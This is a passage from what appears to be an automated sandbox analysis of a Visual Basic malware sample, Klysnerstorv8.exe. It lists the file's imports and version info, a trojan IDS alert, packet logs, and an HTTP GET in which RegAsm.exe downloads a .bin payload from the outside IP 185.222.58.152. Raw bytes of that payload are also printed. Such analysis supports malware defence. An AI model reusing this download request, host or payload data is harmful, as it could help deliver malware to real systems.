          .rsrc0xf0000x9b40x1000False0.18017578125data2.10544721685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_ICON0xf8840x130data
          RT_ICON0xf59c0x2e8data
          RT_ICON0xf4740x128GLS_BINARY_LSB_FIRST
          RT_GROUP_ICON0xf4440x30data
          RT_VERSION0xf1500x2f4dataHungarianHungary

          Imports

          DLLImport
          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaAryMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, _CIatan, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

          Version Infos

          DescriptionData
          Translation0x040e 0x04b0
          LegalCopyrightCopyright (C) AC
          InternalNameKlysnerstorv8
          FileVersion1.00
          CompanyNameAC
          LegalTrademarksCopyright (C) AC
          CommentsAC
          ProductNameAC
          ProductVersion1.00
          FileDescriptionAC
          OriginalFilenameKlysnerstorv8.exe

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          HungarianHungary

          Network Behavior

          Snort IDS Alerts

          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          02/22/21-15:18:23.821649TCP2018752ET TROJAN Generic .bin download from Dotted Quad4972680192.168.2.6185.222.58.152

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Feb 22, 2021 15:18:20.784945011 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.774292946 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.820786953 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.820916891 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.821649075 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.871231079 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.871278048 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.871300936 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.871324062 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.871339083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.871368885 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.871401072 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.917999983 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918077946 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918142080 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918162107 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.918201923 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.918204069 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918262005 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918268919 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.918320894 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918323040 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.918366909 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918392897 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.918406963 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918437004 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.918438911 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.918500900 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.964941025 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965034008 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965125084 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965145111 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965161085 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965177059 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965183020 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965204954 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965220928 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965223074 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965238094 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965255976 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965270042 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965282917 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965286016 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965302944 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965315104 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965323925 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965341091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965358973 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965361118 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965379953 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965396881 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965415955 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965428114 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965451002 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.011744022 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.011780024 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.011790991 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.011991978 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.014591932 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014625072 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014642000 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014662027 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014687061 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014705896 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014730930 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014756918 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014779091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014800072 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014818907 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014842033 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014864922 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014889002 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014914036 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014939070 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014961958 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014978886 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014997005 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015012980 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015031099 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015048027 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015067101 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015083075 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015100002 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015115976 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015134096 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015150070 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015165091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015181065 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015196085 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015415907 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.058439016 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058478117 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058501959 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058525085 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058532000 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.058543921 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058562994 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.058626890 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.061870098 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061903954 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061923027 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061944008 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061964989 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061985016 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061989069 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062011003 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062033892 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062051058 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062053919 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062077045 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062084913 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062098026 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062110901 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062119961 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062140942 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062153101 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062161922 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062186956 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062195063 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062210083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062216997 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062231064 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062251091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062259912 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062273979 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062294960 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062298059 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062316895 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062331915 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062338114 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062362909 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062366009 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062386036 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062407017 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062412024 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062428951 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062449932 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062455893 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062479019 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062484026 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062500954 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062521935 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062521935 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062549114 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062556982 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062573910 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062596083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062597990 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062617064 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062633038 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062640905 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062690973 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.105156898 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105214119 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105238914 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105263948 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105289936 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105312109 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105334997 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105356932 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105374098 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105402946 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.105465889 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109148979 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109195948 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109220982 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109247923 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109272957 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109296083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109318972 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109317064 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109344006 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109366894 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109395981 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109401941 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109411955 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109428883 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109438896 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109464884 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109481096 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109493971 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109522104 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109536886 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109544039 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109564066 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109569073 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109595060 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109600067 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109620094 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109621048 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109643936 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109644890 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109669924 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109669924 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109693050 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109699965 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109726906 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109729052 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109743118 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109751940 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109772921 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109776974 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109798908 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109805107 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109823942 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109829903 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109857082 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109858036 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109877110 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109884024 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109899044 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109914064 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109925032 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109941006 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109954119 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109966040 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109977007 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109991074 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110014915 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110018015 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110038996 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110047102 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110074043 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110090017 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110097885 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110126972 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110129118 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110157967 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110162020 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110182047 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110187054 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110208035 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110213041 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110234976 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110245943 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110260010 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110271931 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110286951 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110310078 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110311031 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110337973 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110344887 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110368013 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110375881 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110393047 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110405922 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110419989 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110431910 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110438108 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110465050 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110475063 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110491991 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110508919 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110510111 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110532999 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110538006 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110564947 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110588074 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110588074 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110610962 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110615969 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110640049 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110662937 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110671043 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110676050 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110687971 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110697985 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110709906 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110728025 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.110733032 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.110774040 CET4972680192.168.2.6185.222.58.152

          HTTP Request Dependency Graph

          • 185.222.58.152

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.649726185.222.58.15280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampkBytes transferredDirectionData
          Feb 22, 2021 15:18:23.821649075 CET1119OUTGET /EDUORIGIN_baxLdLkc20.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Host: 185.222.58.152
          Cache-Control: no-cache
          Feb 22, 2021 15:18:23.871231079 CET1120INHTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Mon, 22 Feb 2021 11:17:02 GMT
          Accept-Ranges: bytes
          ETag: "8df48f3ec9d71:0"
          Server: Microsoft-IIS/8.5
          Date: Mon, 22 Feb 2021 14:18:23 GMT
          Content-Length: 219200
          Data Raw: 16 85 f9 a9 43 ac 05 77 65 28 e1 36 60 ed a1 81 a8 24 f2 4a dd e8 88 5e 85 14 43 d8 8b 12 e1 e0 af 2f 32 f8 2b e1 8b de 9c fe 91 0b bc e0 6d 7c 04 63 57 7f 87 91 4a db 22 83 12 a6 5b cd 3c 83 6f 9c 1f 7b 95 89 34 27 6a cf eb bf ea de 22 4e 75 55 90 44 e6 00 cc 46 ca b6 61 51 77 ae cc c2 da 97 74 2b f5 f0 3c 06 71 f1 ed 7e a1 a0 d7 d8 3c 9e ba f2 9c b1 1f f6 a4 e5 5e 4e 65 83 26 ec e8 6b af 17 19 ef c1 d9 3c 6f 5a b7 62 1d 84 6e 0d 46 b1 1e ef 16 cb 97 06 f4 05 a4 23 c6 30 b3 36 1c af 61 21 62 39 29 54 e2 24 af c4 32 bb 27 7e 5e 70 4c 32 95 51 db 06 dd ed 5f 74 d4 32 c6 6f a6 dd 16 08 c5 25 dd c8 f9 04 0a 15 86 56 38 07 b3 a3 9a f5 1b b1 2e c1 9d 8f 16 64 f3 1a c8 de 84 94 6a 25 06 a1 df fc 1b 2c 09 b4 50 57 5a ee fa aa 5e d2 84 0c b2 07 e7 4b bf 22 45 3d 80 f8 10 52 6f d1 52 2d 14 42 1c 1a 81 26 5c 19 02 16 e2 8d c8 90 e0 cf 58 a0 7c c7 46 db 34 e6 f0 9a 09 3d 37 d8 bd e9 e5 8a b7 e2 6f 40 d1 9d 99 31 2e 21 56 72 5a d6 db a1 d7 71 66 31 ff de 9d ab ba 62 d9 46 5b b4 5c c3 c5 d1 76 de 7a 26 0d 91 4e 7b 98 9a f6 b6 25 3e 83 a5 5e a4 6c ed 8a 0b df 1f 81 75 24 91 7c ce 17 3b 2d f4 23 16 38 f7 cc 7d fb 33 e5 70 cb 30 d9 12 ca e8 6d 1d 08 89 53 18 0f 01 ed f9 d2 79 f2 c0 8d bb 6d c7 af 33 da a3 5a 9b fa 92 1c 6a 62 e7 bb af 31 1c 16 42 2a 1a 3c b2 fd 6f 4e 07 a3 3a 76 93 49 f7 3b d3 44 43 00 f2 46 d5 f1 7e 80 cc 22 8c d6 38 a5 f6 7b bb 43 aa a6 59 f9 64 e7 16 08 bc 18 0d e4 08 91 d2 c6 00 00 00 bd ae 40 ce 1b 19 8e b3 9e d6 43 24 71 06 85 83 a8 94 5b 9f 8c 11 45 e0 90 f3 2d 26 36 1f 4a 86 71 f4 d0 c7 ef 82 05 2f 9e ca 49 41 c6 bf 87 5a 60 f2 98 7c 8e a0 be 3a bd fb e7 ab af 56 0d ae f7 29 0d 5d 05 5c 31 86 a2 c3 f8 1b c3 0a cf f8 a5 3e a2 fc 28 c0 20 8f 0a f6 dc e5 b0 a9 5d 68 ad b6 61 6a 59 36 2b a8 fe 33 87 f9 be 8f 8c 0f f2 d7 70 52 3b 51 a8 8e e5 31 dc e4 51 c2 25 b8 7b ee 1f 69 3f cf 6f b5 4b 8d 0d 33 91 97 28 32 90 fa 98 cd 1a e6 cd 4c cb 32 ea a1 7d 6f d6 6c db 6a c0 a3 39 f8 06 c1 28 7c 88 b7 90 16 ab 89 df f1 62 3f 1c a2 85 c2 1d a8 62 d4 46 27 06 9f 94 f6 0e 52 98 93 ec f6 3d 8f fc f0 eb 9a 1c f4 3c 96 db 7d 18 30 d3 b8 bd 0f 3b df db 3e 7a 3d ee b6 2b 7e b6 8b 67 f5 4f ba 24 be 19 37 e9 a9 97 1b f2 a3 dc 83 55 94 5b 7a 20 05 2e 7b 21 ae 2d a6 d3 6e 8c 53 1e 87 e6 c4 27 6a fe 1c c1 c0 85 9d 1d f1 37 81 60 b7 af 60 ee 99 fe c8 ac a5 18 6f 58 56 12 d7 52 db 70 58 d1 2c 15 5c cd 47 53 96 56 49 db af 23 81 d3 fa 62 fc 70 eb 17 4f b8 03 61 6f a0 ba 89 c7 2d 48 36 88 af b5 63 2c 92 32 40 4e 2f 30 a2 86 18 c7 06 25 45 32 bc a8 11 c5 6c 7b a0 e4 f7 25 13 42 0c 30 c2 e8 c8 82 c5 dc 1c d2 5b fe 00 eb 21 a7 7a 91 77 35 da 86 02 33 23 ea 8d 6c 9d 89 33 3f 90 ce c7 bd 3e 23 09 ad b3 56 90 44 e2 6f c0 46 8a bc 4b 42 47 ac cc ee da 97 74 2f f5 f0 2d 10 7a da f6 7e a6 b7 29 d9 10 9c a2 f9 9c b6 09 08 a5 c9 5c 59 ee 83 21 f4 18 75 39 1b 32 59 e3 f7 63 d3 5b fb ab 53 dd 06 64 3f bb 7d ad 7b ac cb 67 99 25 c2 42 a8 4f ca 49 17 d6 04 06 07 b2 46 58 89 52 84 80 7a fe f9 12 1d 16 3e 17 98 5b c9 dc dc c1 5d 5f d6 19 25 3d 